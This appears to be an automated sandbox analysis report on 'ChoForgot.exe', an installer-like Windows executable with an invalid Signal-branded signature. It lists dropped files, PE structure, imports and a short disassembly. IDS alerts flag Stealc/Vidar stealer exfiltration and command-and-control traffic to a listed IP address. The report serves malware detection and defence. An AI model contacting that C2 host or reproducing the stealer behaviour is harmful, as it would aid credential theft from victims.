                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):291
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                      MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                      SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                      SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                      SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):130866
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                      MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                      SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                      SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                      SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):154477
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                      MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                      SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                      SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                      SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (7850)
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):7856
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.789955495614175
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:qPaH6666sOE93rm+JwwFd66666f/ckmNKfwIlvGKkglLcejpWjo:qCH66661EJx66666HXBkqoe1Wjo
                                                                                                                                                                                                                                                                                                      MD5:C02718F5C43496A84911527142FC158C
                                                                                                                                                                                                                                                                                                      SHA1:F9DD6EA6F80F703F76768C032A25513C79FA9EAC
                                                                                                                                                                                                                                                                                                      SHA-256:7C35BF89981696F63FB110BACB61785B99B8587343BF26D971130407C64E07EB
                                                                                                                                                                                                                                                                                                      SHA-512:23F43234755795D473108A4C2674610C0A405EE1CD96C5EBA9371BF9FE62FAB516D9D540CD2BED70680181D6BA965973CCA7A16C10ABD8AA71B4B5B3768B681E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                      Preview:)]}'.["",["pok.mon go holiday part 2","michael penix jr falcons highlights","tesco aldi morrisons product recalls","quordle hints december 23","michigan winter weather advisory","monday night football","logan airport holiday travel delays","aew dynamite"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):132739
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.436984377819433
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:fjkJQ7O4N5dTm+syHEt4W3XdQ4Q6quSr/nUW2i6o:fWQ7HTt/sHdQ4Q6qDfUW8o
                                                                                                                                                                                                                                                                                                      MD5:6EDCEF36C27BD2E50538AB6DC8790877
                                                                                                                                                                                                                                                                                                      SHA1:03F00F55185C5E8C1F911EB1C37AD64C6A4418C4
                                                                                                                                                                                                                                                                                                      SHA-256:5C37D965C76078A626B79FDCA9386A5E229E2FA58C5AD5CD9E02C30DA159E07A
                                                                                                                                                                                                                                                                                                      SHA-512:4FAF6E36F23947F3974B53BE6B1AE1C9D1618ED75B6D7D1182818B3514401E5229FC34584007BAFA203CD40A89025282894A034025FA945AEABB3E9398CAF338
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):5162
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                                      MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                                      SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                                      SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                                      SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                      Size (bytes):1660
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                                      MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                                      SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                                      SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                                      SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.961737911202392
                                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                      File name:ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File size:1'111'393 bytes
                                                                                                                                                                                                                                                                                                      MD5:06342512b7bcdfdda8d6ea8e2d5a24e4
                                                                                                                                                                                                                                                                                                      SHA1:5a656ac27d5a03ee63f08dd499bacd01e0a12c3f
                                                                                                                                                                                                                                                                                                      SHA256:89b55665c76315777e1f2a9a5be784fd2590b917388f657c6f5c2caa055e87c2
                                                                                                                                                                                                                                                                                                      SHA512:5824c39a30b7acacd949812bafcf99afcdc95361b2196567aae4e1f2445803c37971a572537c132a01b930e204745ccf7f082386147ea3b611c745eef2ea3eb4
                                                                                                                                                                                                                                                                                                      SSDEEP:24576:StmrKn0UVWKbcO1wZ8Baw0QD4Iv2kSen/rhSjJVC6h2Lg2np2uGVemv+Gl9o:8O6rIO1k8L0QcIv7nThSjeuKzDAemu
                                                                                                                                                                                                                                                                                                      TLSH:C735239AAB7118FEFFE20EB16136C50609BAF2554B38D66FB311884E7419B417A0C737
                                                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                                      Icon Hash:6066ced2d0c4fc0c
                                                                                                                                                                                                                                                                                                      Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                      Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                                                                                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                                                                                      • 11/09/2024 15:33:41 12/09/2027 15:33:41
                                                                                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                                                                                      • CN="Signal Messenger, LLC", O="Signal Messenger, LLC", L=Mountain View, S=California, C=US, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=6703101, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                                                                                      Thumbprint MD5:D4E75D16F15BD3BC32ACDF4EAF83A59A
                                                                                                                                                                                                                                                                                                      Thumbprint SHA-1:8A5A56EFFDC462AE8A6CF732BB21E2541995BF36
                                                                                                                                                                                                                                                                                                      Thumbprint SHA-256:44DBAC9846A7E8F8EAE8BF0F9518B44FB86C257DD797742B767AF6ED1995AAF4
                                                                                                                                                                                                                                                                                                      Serial:4EF1C2D67B37517957F42E8D
                                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                                      sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                                                      push 00000020h
                                                                                                                                                                                                                                                                                                      xor ebp, ebp
                                                                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                      call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                      push 00008001h
                                                                                                                                                                                                                                                                                                      call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                      push 00000008h
                                                                                                                                                                                                                                                                                                      mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                      call 00007FEDFCC4B47Bh
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      push 000002B4h
                                                                                                                                                                                                                                                                                                      mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      push 0040A264h
                                                                                                                                                                                                                                                                                                      call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                      push 0040A24Ch
                                                                                                                                                                                                                                                                                                      push 00476AA0h
                                                                                                                                                                                                                                                                                                      call 00007FEDFCC4B15Dh
                                                                                                                                                                                                                                                                                                      call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                                      mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                                                      call 00007FEDFCC4B14Bh
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                      cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                      mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                      mov eax, edi
                                                                                                                                                                                                                                                                                                      jne 00007FEDFCC48A4Ah
                                                                                                                                                                                                                                                                                                      push 00000022h
                                                                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                                                                      mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                                      call 00007FEDFCC4AE21h
                                                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                                                      call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                      mov esi, eax
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                      jmp 00007FEDFCC48AD3h
                                                                                                                                                                                                                                                                                                      push 00000020h
                                                                                                                                                                                                                                                                                                      pop ebx
                                                                                                                                                                                                                                                                                                      cmp ax, bx
                                                                                                                                                                                                                                                                                                      jne 00007FEDFCC48A4Ah
                                                                                                                                                                                                                                                                                                      add esi, 02h
                                                                                                                                                                                                                                                                                                      cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                      • [LNK] VS2010 SP1 build 40219
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x3a2a6 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x10c3f1 | 0x3170 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x100000 | 0x3a2a6 | 0x3a400 | 0a4ac7917f8a3b7a52b0beb7e6d3dd3a | False | 0.9476512204935622 | data | 7.863903248598523 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x13b000 | 0xfd6 | 0x1000 | b1f76fcbcb3ad609e320a3ba8f8870df | False | 0.56884765625 | data | 5.323899369082058 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x1002c8 | 0x301ff | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9923650180855219 |
| RT_ICON | 0x1304c8 | 0x4250 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.000942507068803 |
| RT_ICON | 0x134718 | 0x1744 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0018468770987239 |
| RT_ICON | 0x135e5c | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.3781529698942229 |
| RT_ICON | 0x1384c4 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.46379781420765026 |
| RT_ICON | 0x1395ec | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.598404255319149 |
| RT_DIALOG | 0x139a54 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x139b54 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x139c70 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x139cd0 | 0x5a | data | English | United States | 0.7888888888888889 |
| RT_VERSION | 0x139d2c | 0x2a4 | data | English | United States | 0.4985207100591716 |
| RT_MANIFEST | 0x139fd0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |

| DLL | Import |
|---|---|
| KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
| USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
| GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
| SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
| ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-23T17:14:32.128190+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.6 | 49765 | 188.245.216.205 | 443 | TCP |
| 2024-12-23T17:14:36.748415+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.6 | 49777 | 188.245.216.205 | 443 | TCP |
| 2024-12-23T17:14:36.748679+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 188.245.216.205 | 443 | 192.168.2.6 | 49777 | TCP |
| 2024-12-23T17:14:39.044497+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 188.245.216.205 | 443 | 192.168.2.6 | 49784 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.663976908 CET4434972620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.664155006 CET49726443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.666799068 CET49726443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.666805029 CET4434972620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.667123079 CET4434972620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.669233084 CET49726443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.669280052 CET49726443192.168.2.620.198.119.84
